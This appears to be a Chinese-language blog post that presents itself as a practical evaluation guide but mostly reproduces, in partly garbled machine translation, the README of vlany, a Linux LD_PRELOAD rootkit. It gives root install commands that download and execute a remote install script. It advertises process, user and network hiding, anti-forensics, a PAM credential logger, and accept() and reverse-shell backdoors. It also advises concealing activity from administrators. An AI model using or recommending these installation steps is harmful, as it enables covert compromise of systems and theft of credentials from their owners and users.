vlany:实践指南

作者:袖梨 2026-09-11

准备试用vlany之前,先别急着安装;这个项目提供的是Linux LDPRELOAD rootkit(x86 和 x8664 架构)。从日常自动化的使用方式看,输入边界、依赖和失败处理如果不清楚就很难稳定复用是采用前必须回答的问题。我的评估方法是用一项范围明确的真实任务完成最小试跑,然后检查配置时间、输出质量、异常信息和维护痕迹是否与文档一致。对愿意先做小范围验证并复查原始文档的团队来说,这个仓库值得继续验证;只求即装即用的人则要先看维护成本。

VLANY IS NO LONGER MAINTAINED.

https://github.com/naworkcaj/bdvl IS. PLEASE REFER TO THAT FOR CONSTANT UPDATES.

vlany(维基)

vlany 是 Linux LD_PRELOAD rootkit .

  • 功能列表
  • 反检测

安装中

  • vlany的quick_install.sh脚本就是installation.的fastest/easiest方法 root@vlany:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh quick_install.sh 脚本自动从此存储库下载 vlany 的最新版本,解压存档,然后从 /tmp/ 中的新随机目录执行常规安装脚本。默认情况下,一旦执行完成,quick_install.sh 脚本就会删除新目录 finished.

  • 将 vlany 安装到系统上非常简单,因为它带有自动安装脚本。
    要安装 vlany,您需要首先从我们的 GitHub 下载它(始终最新且值得信赖)
    root@vlany:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

  • 下载完成后,您只需在 vlany-master 中运行 install.sh 即可。
    root@vlany:~# cd vlany-master && ./install.sh
    默认情况下,这将提示您安装 tui,但如果首选 cli,您可以使用 --cli 参数来调用类似的 cli installation.

ASCIICAST OF INSTALLATION

在 Debian 8 机器上定期安装 tui,使用 suid 二进制文件来升级 tmp 用户的权限。在现实生活场景中,您需要使用一些环境变量来防止任何人在 root. 时看到您的活动

下载

quick_install.sh vlany.tar.gz 填充 const.h(config.py 执行后)

特点

  • 进程隐藏
  • 用户隐藏
  • 网络隐藏
  • LXC 集装箱
  • 反调试
  • 反取证
  • 持久(重新)安装和反检测
  • 动态链接器修改
  • 后门
    • Accept() 后门(源自 Jynx2)
    • PAM后门
      • PAM 身份验证记录器
    • snodew反壳后门
  • vlany 独占命令

已知错误

此处列出的任何错误都将一直存在,直到达成解决方案为止。如果错误已报告为 问题,则相应问题也将链接到错误列表中。如果错误得到解决,列表将从此处删除,如果与该错误相关的任何问题仍然存在,它将被关闭。

严重错误

  1. 目前有一个实验性的重启砖修复。有些系统会变砖,有些则不会。请报告任何在重新启动时出现问题的系统,并在报告中给出 vlany 安装的情况。查看问题页面,看看是否已经提交了类似的问题。
  2. vlany 无法在 CentOS 6.6 以上版本上正确安装。

深入 README.txt(很详细但不维护)

NOTE: vlany 正在积极开发中。此存储库不断发生更改,因此请注意 vlany 是非常实验性的。

相关文章

精彩推荐